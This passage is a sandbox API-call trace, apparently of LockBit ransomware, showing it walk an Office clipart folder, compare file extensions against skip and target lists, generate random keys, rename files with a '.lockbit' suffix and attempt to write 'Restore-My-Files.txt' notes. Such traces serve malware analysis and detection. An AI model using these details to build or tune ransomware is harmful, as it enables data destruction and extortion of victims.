(lpString1=".hta", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.517] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.517] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00440_.WMF") returned 1 [0109.518] lstrcmpiW (lpString1="ntldr", lpString2="BS00440_.WMF") returned 1 [0109.518] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00440_.WMF") returned 1 [0109.518] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00440_.WMF") returned -1 [0109.518] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00440_.WMF") returned -1 [0109.518] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00440_.WMF") returned 1 [0109.518] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00440_.WMF") returned 1 [0109.518] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.518] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF") returned=".WMF" [0109.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.518] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.519] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.519] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.lockbit") returned 72 [0109.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00440_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0109.520] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.520] malloc (_Size=0x40068) returned 0x3e70008 [0109.520] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=5580) returned 1 [0109.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0109.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0109.521] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0109.525] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.525] malloc (_Size=0xa6) returned 0x77d800 [0109.525] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.526] free (_Block=0x77d800) [0109.526] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00440_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.526] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.526] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25090400, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x25090400, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00441_.WMF", cAlternateFileName="")) returned 1 [0109.526] lstrcmpiW (lpString1=".", lpString2="BS00441_.WMF") returned -1 [0109.526] lstrcmpiW (lpString1="..", lpString2="BS00441_.WMF") returned -1 [0109.526] PathFindExtensionW (pszPath="BS00441_.WMF") returned=".WMF" [0109.526] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.526] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.526] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.526] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.526] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.526] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.527] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.528] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00441_.WMF") returned 1 [0109.529] lstrcmpiW (lpString1="ntldr", lpString2="BS00441_.WMF") returned 1 [0109.529] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00441_.WMF") returned 1 [0109.529] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00441_.WMF") returned -1 [0109.529] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00441_.WMF") returned -1 [0109.529] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00441_.WMF") returned 1 [0109.529] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00441_.WMF") returned 1 [0109.529] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.529] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF") returned=".WMF" [0109.529] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.529] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.529] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.530] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.530] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.lockbit") returned 72 [0109.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00441_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.531] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.531] malloc (_Size=0x40068) returned 0x3ef0008 [0109.531] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=3524) returned 1 [0109.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0109.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0109.532] ReadFile (in: hFile=0x13c0, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.538] malloc (_Size=0xa6) returned 0x77d800 [0109.538] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.539] free (_Block=0x77d800) [0109.539] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00441_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.539] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.539] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.539] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23d7d700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x23d7d700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x9b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00442_.WMF", cAlternateFileName="")) returned 1 [0109.539] lstrcmpiW (lpString1=".", lpString2="BS00442_.WMF") returned -1 [0109.539] lstrcmpiW (lpString1="..", lpString2="BS00442_.WMF") returned -1 [0109.539] PathFindExtensionW (pszPath="BS00442_.WMF") returned=".WMF" [0109.539] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.539] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.539] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.539] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.539] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.539] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.540] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.541] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.541] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00442_.WMF") returned 1 [0109.541] lstrcmpiW (lpString1="ntldr", lpString2="BS00442_.WMF") returned 1 [0109.541] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00442_.WMF") returned 1 [0109.541] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00442_.WMF") returned -1 [0109.542] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00442_.WMF") returned -1 [0109.542] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00442_.WMF") returned 1 [0109.542] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00442_.WMF") returned 1 [0109.542] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.542] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF") returned=".WMF" [0109.542] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.542] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.542] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.543] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.543] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF.lockbit") returned 72 [0109.543] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00442_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00442_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.544] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.544] malloc (_Size=0x40068) returned 0x3d70048 [0109.545] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=2488) returned 1 [0109.545] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0109.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.546] GetProcAddress (hModule=0x753f0000, 